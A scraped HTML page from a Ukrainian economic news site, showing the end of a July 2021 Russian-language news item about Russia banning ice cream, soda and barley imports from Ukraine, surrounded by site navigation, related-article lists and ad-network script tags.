<p>Напомним, ранее Беларусь решила ввести режим индивидуального лицензирования на ввоз группы товаров из Украины.</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/world/full/507-dark-markets-mogut-stat-multiplikatorom-geopoliticheskoj-sily" >"Dark markets" могут стать мультипликатором геополитической силы</a></p>
<p>Отметим также, что после аннексии Крыма Российской Федерацией и начала военного противостояния на Донбассе, между нашими странами началось сильное торговое противостояние. Украинцы бойкотировали российские товары на полках магазинов и требовали от правительства полной остановки торговых отношений. </p>
<div class="tptn_counter" style="color:white;" id="tptn_counter_4854077"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4854077&amp;_wpnonce=543f81a1e7"></script></div>			<br />
									
			<span itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
			<div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
				<img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/>


			  <meta itemprop="width" content="512">
			  <meta itemprop="height" content="512">
			</div>
			<meta itemprop="name" content="Экономические новости" />
			<meta itemprop="telephone" content="+380958836229">
			<meta itemprop="address" content="Киев">
			
			</span>
			
			<span itemprop="author" itemscope itemtype="https://schema.org/Person">
				
							<meta itemprop="name" content="Оксана Ельченко" />
			
			
			</span>
			
			<meta itemprop="datePublished" content="2021-07-05T13:40:21+03:00"/>
			<meta itemprop="dateModified" content="2021-07-05T13:40:45+03:00"/>
			
						
			<meta itemprop="genre" content="Новости рынков"/>
			<meta itemprop="description" content="В России решили расширить список запрещенных продуктов из Украины "/>
			
			
		
						
			
			<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow">

			<span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2021/07/morogenoe-460x279.jpg">

			<span itemprop="image" content="https://enovosty.com/wp-content/uploads/2021/07/morogenoe-460x279.jpg">

			<meta itemprop="width" content="460">

			<meta itemprop="height" content="279"> </span></span>

			</div>

						
			
		</article>
	</div>

    <div class="postFooter" style="padding:0;">
					<a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank">
				<img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg">
			</a>
							<span id="authorName" style="margin-right: 25px;float: left;">
				<span id="label">
					Автор: Оксана Ельченко				</span>
			</span>
				<div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">
		ТЕГИ: <a href="https://enovosty.com/tag/import-tovarov" rel="tag">импорт товаров</a>, <a href="https://enovosty.com/tag/embargo" rel="tag">эмбарго</a>		</div>
					<div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 157</div>
				<div class="voteBox" > </div>
		<br />
		<!-- <p style="font-size:14px; font-style:italic; clear:both;">Присоединяйтесь к странице "Экономические Новости" на <a href="https://www.facebook.com/eizvestia/" rel="nofollow" target="_blank"> <strong style="font-size:14px; color:#369;">Facebook</strong></a>, следите за обновлениями!</p> -->
		<p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p>
		<div class="border">&nbsp;</div>
		<table class="social">
			<tr>
				<td>
					<div class="addtoany_shortcode"><div class="a2a_kit a2a_kit_size_22 addtoany_list" data-a2a-url="https://enovosty.com/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy" data-a2a-title="Россия запретила мороженое, газировку и ячмень из Украины"><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_telegram" href="https://www.addtoany.com/add_to/telegram?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="Telegram" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy&amp;linkname=%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%20%D0%B7%D0%B0%D0%BF%D1%80%D0%B5%D1%82%D0%B8%D0%BB%D0%B0%20%D0%BC%D0%BE%D1%80%D0%BE%D0%B6%D0%B5%D0%BD%D0%BE%D0%B5%2C%20%D0%B3%D0%B0%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%BA%D1%83%20%D0%B8%20%D1%8F%D1%87%D0%BC%D0%B5%D0%BD%D1%8C%20%D0%B8%D0%B7%20%D0%A3%D0%BA%D1%80%D0%B0%D0%B8%D0%BD%D1%8B" title="Copy Link" rel="nofollow noopener" target="_blank"></a></div></div>				</td>
			</tr>			
		</table>
		<div class="printmail" style="float: right; width: 54px; margin-top: 8px;">
			 <a href="https://enovosty.com/print?printajax=4854077" style="padding-right:3px;">
				<img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать">
			</a>
			 <a href="#" id="mailto">
				<img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту">
			</a>
			<div class="mailwin" style="display:none;">
				<span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span>
				<input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button>
			</div>
			<p class="al_loadingImage" style="top:4%;">&nbsp;</p>
		</div>
		<div class="border">&nbsp;</div>		
	
		
    <div class="wpdiscuz_top_clearing"></div>
    <div id='comments' class='comments-area'><div id='respond' style='width: 0;height: 0;clear: both;margin: 0;padding: 0;'></div>    <div id="wpdcom" class="wpdiscuz_unauth wpd-default wpd-layout-1 wpd-comments-open">
                    <div class="wc_social_plugin_wrapper">
                            </div>
            <div class="wpd-form-wrap">
                <div class="wpd-form-head">
                                            <div class="wpd-sbs-toggle">
                            <i class="far fa-envelope"></i> <span class="wpd-sbs-title">Подписаться</span> <i class="fas fa-caret-down"></i>
                        </div>
                                            <div class="wpd-auth">
                        <div class='wpd-social-login'><span class='wpd-connect-with'>Войти с помощью</span><span class='wpdsn wpdsn-fb wpdiscuz-login-button' wpd-tooltip='Facebook'><i class='fab fa-facebook'></i></span><span class='wpdsn wpdsn-tw wpdiscuz-login-button' wpd-tooltip='Twitter'><i class='fab fa-twitter'></i></span><span class='wpdsn wpdsn-gg wpdiscuz-login-button' wpd-tooltip='Google'><i class='fab fa-google'></i></span><div class='wpdiscuz-social-login-spinner'><i class='fas fa-spinner fa-pulse'></i></div><div class='wpd-clear'></div></div>                        <div class="wpd-login">
                            <div class='wpd-sep'></div><a href="https://enovosty.com/wp-login.php?redirect_to=https%3A%2F%2Fenovosty.com%2Fnews%2Fnews-markets%2Ffull%2F507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy"><i class='fas fa-sign-in-alt'></i> авторизуйтесь</a>                        </div>
                    </div>
                </div>
                            <div class="wpd-social-login-agreement" style="display: none;">
                <div class="wpd-agreement-title">Я разрешаю создать мне учетную запись</div>
                <div class="wpd-agreement">Когда вы первый раз заходите с помощью соцсетей, мы получаем публичную информацию из вашей учетной записи, предоставляемой провайдером услуги соцсети в рамках ваших настроек конфиденциальности. Мы также автоматически получаем ваш e-mail адрес для создания вашей учетной записи на нашем веб сайте. Когда она будет создана, вы будете авторизованы под этой учетной записью.</div>
                <div class="wpd-agreement-buttons">
                    <div class="wpd-agreement-buttons-right"><span class="wpd-agreement-button wpd-agreement-button-disagree">Не согласен</span><span class="wpd-agreement-button wpd-agreement-button-agree">Согласен</span></div>
                    <div class="wpd-clear"></div>
                </div>
            </div>
                                                <div class="wpdiscuz-subscribe-bar wpdiscuz-hidden">
                                                    <form action="https://enovosty.com/wp-admin/admin-ajax.php?action=wpdAddSubscription" method="post" id="wpdiscuz-subscribe-form">
                                <div class="wpdiscuz-subscribe-form-intro">Уведомить о </div>
                                <div class="wpdiscuz-subscribe-form-option" style="width:40%;">
                                    <select class="wpdiscuz_select" name="wpdiscuzSubscriptionType" >
                                                                                    <option value="post">новых последующих комментариях</option>
                                                                                                                                <option value="all_comment" >новых ответах на мои комментарии</option>
                                                                                </select>
                                </div>
                                                                    <div class="wpdiscuz-item wpdiscuz-subscribe-form-email">
                                        <input  class="email" type="email" name="wpdiscuzSubscriptionEmail" required="required" value="" placeholder="Email"/>
                                    </div>
                                                                    <div class="wpdiscuz-subscribe-form-button">
                                    <input id="wpdiscuz_subscription_button" class="wpd-prim-button" type="submit" value="&rsaquo;" name="wpdiscuz_subscription_button" />
                                </div> 
                                <input type="hidden" id="wpdiscuz_subscribe_form_nonce" name="wpdiscuz_subscribe_form_nonce" value="4d5a2fab18" /><input type="hidden" name="_wp_http_referer" value="/news/news-markets/full/507-rossiya-zapretila-morozhenoe-gazirovku-i-yachmen-iz-ukrainy" />                            </form>
                                                </div>
                            <div class="wpd-form wpd-form-wrapper wpd-main-form-wrapper" id='wpd-main-form-wrapper-0_0'>
                                </div>
                <div id="wpdiscuz_hidden_secondary_form" style="display: none;">
                    <div class="wpd-form wpd-form-wrapper wpd-secondary-form-wrapper" id='wpd-secondary-form-wrapper-wpdiscuzuniqueid' style='display: none;'>
                            <div class="wpd-secondary-forms-social-content"><div class='wpd-social-login'><span class='wpd-connect-with'>Войти с помощью</span><span class='wpdsn wpdsn-fb wpdiscuz-login-button' wpd-tooltip='Facebook'><i class='fab fa-facebook'></i></span><span class='wpdsn wpdsn-tw wpdiscuz-login-button' wpd-tooltip='Twitter'><i class='fab fa-twitter'></i></span><span class='wpdsn wpdsn-gg wpdiscuz-login-button' wpd-tooltip='Google'><i class='fab fa-google'></i></span><div class='wpdiscuz-social-login-spinner'><i class='fas fa-spinner fa-pulse'></i></div><div class='wpd-clear'></div></div>            <div class="wpd-social-login-agreement" style="display: none;">
                <div class="wpd-agreement-title">Я разрешаю создать мне учетную запись</div>
                <div class="wpd-agreement">Когда вы первый раз заходите с помощью соцсетей, мы получаем публичную информацию из вашей учетной записи, предоставляемой провайдером услуги соцсети в рамках ваших настроек конфиденциальности. Мы также автоматически получаем ваш e-mail адрес для создания вашей учетной записи на нашем веб сайте. Когда она будет создана, вы будете авторизованы под этой учетной записью.</div>
                <div class="wpd-agreement-buttons">
                    <div class="wpd-agreement-buttons-right"><span class="wpd-agreement-button wpd-agreement-button-disagree">Не согласен</span><span class="wpd-agreement-button wpd-agreement-button-agree">Согласен</span></div>
                    <div class="wpd-clear"></div>
                </div>
            </div>
            </div><div class="clearfix"></div>
                                </div>
                </div>
                            <div class="wpd-login-to-comment">Пожалуйста, войдите, чтобы прокомментировать</div>
                                </div>
                        <div id="wpd-threads" class="wpd-thread-wrapper">
                <div class="wpd-thread-head">
                    <div class="wpd-thread-info " data-comments-count="0">
                        <span class='wpdtc' title='0'>0</span> Комментарий                    </div>
                                        <div class="wpd-space"></div>
                    <div class="wpd-thread-filter">
                                                    <div class="wpd-filter wpdf-reacted wpd_not_clicked" wpd-tooltip="Популярнейший комментарий "><i class="fas fa-bolt"></i></div>
                                                        <div class="wpd-filter wpdf-hottest wpd_not_clicked" wpd-tooltip="Цепочка актуального комментария"><i class="fas fa-fire"></i></div>
                                                </div>
                </div>
                <div class="wpd-comment-info-bar">
                    <div class="wpd-current-view"><i class="fas fa-quote-left"></i> Межтекстовые Отзывы </div>
                    <div class="wpd-filter-view-all">Посмотреть все комментарии</div>
                </div>
                                <div class="wpd-thread-list">
                                        <div class="wpdiscuz-comment-pagination">
                                            </div>
                </div>
            </div>
                </div>
        </div>
    <div id="wpdiscuz-loading-bar" class="wpdiscuz-loading-bar-unauth"></div>
    <div id="wpdiscuz-comment-message" class="wpdiscuz-comment-message-unauth"></div>
    		
	</div>  <!--postfooter-->
    	
	<!-- <p>В данный момент Вы читаете новость "Россия запретила мороженое, газировку и ячмень из Украины". Вас также, возможно, заинтересуют другие последние <a style="color: #336699;text-decoration: underline;" href="https://enovosty.com/news">новости</a> Украины и мира на enovosty.com</p> -->
</div>


<br />


<!-- /17774365/enovosty.com_300x600 -->
<div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'>
<script>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });
</script>
</div>
<br>





<br />


 

<div class="mainPageWiget articles" style="overflow:visible;">
	<p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;">
	<img src="https://enovosty.com/wp-content/themes/eizvestia/img/en_analitics.jpg" style="margin-right: 5px;margin-bottom: -2px;">
	<a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p>
	<hr style="border: 1px solid #000000;">
					<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4853495">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/politika/full/3006-itogi-iyunya-strax-i-nenavist-v-chernom-more-vakcinnyj-nacionalizm-i-udar-ukrainy-v-vorota-putina">Итоги июня:  Страх и ненависть в Черном море, вакцинный национализм и удар Украины в ворота Путина</a>
						<!-- <span class="posthi">30&#160;июня,&#160;22:30</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4853364">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/ekonomika/full/3006-tenevye-lobbisty-otrasli-drajvery-rosta-ekonomiki-ne-uchastvuyut-v-napolnenii-byudzheta">Теневые лоббисты: отрасли-драйверы роста экономики не участвуют в наполнении бюджета</a>
						<!-- <span class="posthi">30&#160;июня,&#160;10:23</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4853186">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/politika/full/2806-mozhet-li-povorot-zelenskogo-k-populizmu-spasti-ego-na-sleduyushhix-prezidentskix-vyborax">Может ли поворот Зеленского к популизму спасти его на следующих президентских выборах?</a>
						<!-- <span class="posthi">28&#160;июня,&#160;16:39</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4853167">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/society/full/2806-turisticheskaya-ukraina-luchshie-mesta-dlya-nezabyvaemogo-otpuska-2021">Туристическая Украина: Лучшие места для незабываемого отпуска 2021</a>
						<!-- <span class="posthi">28&#160;июня,&#160;14:44</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4853152">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/politika/full/2706-vybory-v-armenii-vojny-ne-budet-no-kartina-stala-eshhe-zaputannee">Выборы в Армении: войны не будет, но картина стала еще запутаннее...</a>
						<!-- <span class="posthi">27&#160;июня,&#160;16:50</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4852788">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/politika/full/2506-incident-s-britanskim-esmincem-v-chernom-more-pochemu-kreml-xochet-sorvat-voennye-ucheniya-see-breeze-2021">Инцидент с британским эсминцем в Черном море: Почему Кремль хочет сорвать военные учения «See Breeze – 2021»</a>
						<!-- <span class="posthi">25&#160;июня,&#160;09:27</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4852231">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/finance/full/2206-nulevaya-deklaraciya-ze-vlast-zagonyaet-grazhdan-strany-v-dolgovuyu-yamu">Нулевая декларация: Зе-власть загоняет граждан страны в долговую яму</a>
						<!-- <span class="posthi">22&#160;июня,&#160;11:59</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4851985">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/finance/full/1906-obderut-na-prodazhe-kvartir-i-vydavyat-s-zemelnyx-nadelov">Обдерут на продаже квартир и выдавят с земельных наделов</a>
						<!-- <span class="posthi">19&#160;июня,&#160;20:54</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4851802">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/ekonomika/full/1806-rynok-zemli-po-ukrainski-kakie-riski-mogut-vozniknut-i-kak-ix-izbezhat">Рынок земли по-украински: какие риски могут возникнуть и как их избежать</a>
						<!-- <span class="posthi">18&#160;июня,&#160;12:22</span> -->
					</div>
									</div>
							<div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4851399">
					<div class="blockTitle" style="margin:4px 0;">
													<img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" />
												<a class="postTitle" href="https://enovosty.com/politika/full/1606-vladimir-fesenko-putin-prizval-vosprinimat-vserez-prizyvy-zelenskogo-prinyat-ukrainu-v-nato">Владимир Фесенко: Путин призвал воспринимать всерьез призывы Зеленского принять Украину в НАТО</a>
						<!-- <span class="posthi">16&#160;июня,&#160;08:27</span> -->
					</div>
											<div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div>
									</div>
			</div>

<br />




<script src="https://5moxhf6z8c.ru/script.js"></script>

<div id="xirubifu-gidadowamapeweco">
<script>
!(function(w,m){(w[m]||(w[m]=[]))&&w[m].push(
{id:'xirubifu-gidadowamapeweco',block:'119650', site_id:'20752'}
);})(window, 'mtzBlocks');
</script>
</div>


<script async src="//whhrux.com/8ny1l7192ivl0mp/y03h8q768vuq/678ypkeqn6.php"></script>
<div data-la-block="dc72cd02-a35e-4362-9683-673dfde66e41"></div>
<br>




 
 
<div id="pop_video" class="six">
	
			<p class="head"><span>популярные видео</span></p>
			<div class="caption" data-limit="6"> 
				<div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div>
				<div class="popular-sort">
					<div class="sort"><a onclick="getPopVideo(31)">месяц</a></div>
					<div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div>				
					<div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div>	
				</div>		
			</div>
		  			<table style="width:100%;" class="newsbody">
			<tr>				<td class="photo ">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_abroad/full/2906-kurez-tureckie-voennye-nauchili-kotenka-marshirovat-video">
								<img width="142" height="88" alt="Курьез: Турецкие военные научили котенка маршировать" src="https://enovosty.com/wp-content/uploads/2021/06/kot2.jpg" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_abroad/full/2906-kurez-tureckie-voennye-nauchili-kotenka-marshirovat-video">Курьез: Турецкие военные научили котенка маршировать</a>	
					</div>	
									</td>
								<td class="photo ">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_incidents/full/307-kurez-v-indii-ogromnyj-krokodlil-utroil-nespeshnuyu-progulku-po-ulicam-goroda-video">
								<img width="142" height="88" alt="Курьез: в Индии огромный крокодил устроил неспешную прогулку по улицам города. ВИДЕО" src="https://enovosty.com/wp-content/uploads/2021/07/screenshot_14-1.png" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_incidents/full/307-kurez-v-indii-ogromnyj-krokodlil-utroil-nespeshnuyu-progulku-po-ulicam-goroda-video">Курьез: в Индии огромный крокодил устроил неспешную прогулку по улицам города. ВИДЕО</a>	
					</div>	
									</td>
								<td class="photo last">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_incidents/full/407-nardep-ot-slugi-naroda-evgenij-bragar-byl-zaderzhan-policiej-v-sostoyanii-narkoticheskogo-opyaneniya-foto">
								<img width="142" height="88" alt="Нардеп от Слуги народа Евгений Брагар был задержан полицией в состоянии наркотического опьянения. ФОТО" src="https://enovosty.com/wp-content/uploads/2021/07/screenshot_6-7.png" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_incidents/full/407-nardep-ot-slugi-naroda-evgenij-bragar-byl-zaderzhan-policiej-v-sostoyanii-narkoticheskogo-opyaneniya-foto">Нардеп от Слуги народа Евгений Брагар был задержан полицией в состоянии наркотического опьянения. ФОТО</a>	
					</div>	
									</td>
				</tr><tr><td class="view"><span><i></i>10467</span></td><td class="view"><span><i></i>3676</span></td><td class="view last"><span><i></i>2880</span></td></tr><tr>				<td class="photo ">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_society/full/307-v-xersonskoj-oblasti-byl-zafiksirovan-smerch-foto">
								<img width="142" height="88" alt="В Херсонской области был зафиксирован смерч. ФОТО" src="https://enovosty.com/wp-content/uploads/2021/07/screenshot_13-2.png" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_society/full/307-v-xersonskoj-oblasti-byl-zafiksirovan-smerch-foto">В Херсонской области был зафиксирован смерч. ФОТО</a>	
					</div>	
									</td>
								<td class="photo ">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_incidents/full/107-v-kieve-perevernulas-ogromnaya-fura-i-zadela-neskolko-avto-video">
								<img width="142" height="88" alt="В Киеве перевернулась огромная фура и задела несколько авто" src="https://enovosty.com/wp-content/uploads/2021/07/38b15baaeaf39d2aec80cf43401e52bc-1.jpg" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_incidents/full/107-v-kieve-perevernulas-ogromnaya-fura-i-zadela-neskolko-avto-video">В Киеве перевернулась огромная фура и задела несколько авто</a>	
					</div>	
									</td>
								<td class="photo last">
					<div class="aimg">
													<a href="https://enovosty.com/news/news_society/full/307-odin-chelovek-pogib-i-shest-postradali-v-dnepre-stolknulis-dve-inormarki-foto-video">
								<img width="142" height="88" alt="Машину два раза подкинуло в воздухе: в Днепре столкнулись две иномарки. ФОТО. ВИДЕО" src="https://enovosty.com/wp-content/uploads/2021/07/screenshot_4-5.png" />
								<span class="stopbg"></span></a>
							
												<a class="title" href="https://enovosty.com/news/news_society/full/307-odin-chelovek-pogib-i-shest-postradali-v-dnepre-stolknulis-dve-inormarki-foto-video">Машину два раза подкинуло в воздухе: в Днепре столкнулись две иномарки. ФОТО. ВИДЕО</a>	
					</div>	
									</td>
				</tr><tr><td class="view"><span><i></i>2373</span></td><td class="view"><span><i></i>2186</span></td><td class="view last"><span><i></i>1625</span></td></tr>			</table>
				<div class="more"><a href="https://enovosty.com/video">Все Видео</a></div>
		
		</div>
<br>

 




<div class="bannerB"><!-- <div id="adriver_banner_B4"></div> -->




<div id="phoenix57c02c9d4f32fe394547dcf1"></div> 
<script>
	var site_id = "57768bd94f32fe17ccf62bcc";
	var widget_id = "57c02c9d4f32fe394547dcf1";
</script>
<script src="//phoenix-widget.com/static/js/jsonp.js"></script>


</div>
<!--
<div id="MIXADV_6543" class="MIXADVERT_NET"></div>
<script>
var node6543 = document.getElementById("MIXADV_6543");
if( node6543 )
{
   var script = document.createElement("script");
   script.charset = "utf-8";
   script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
   node6543.parentNode.appendChild(script);
   script.onerror = function(){
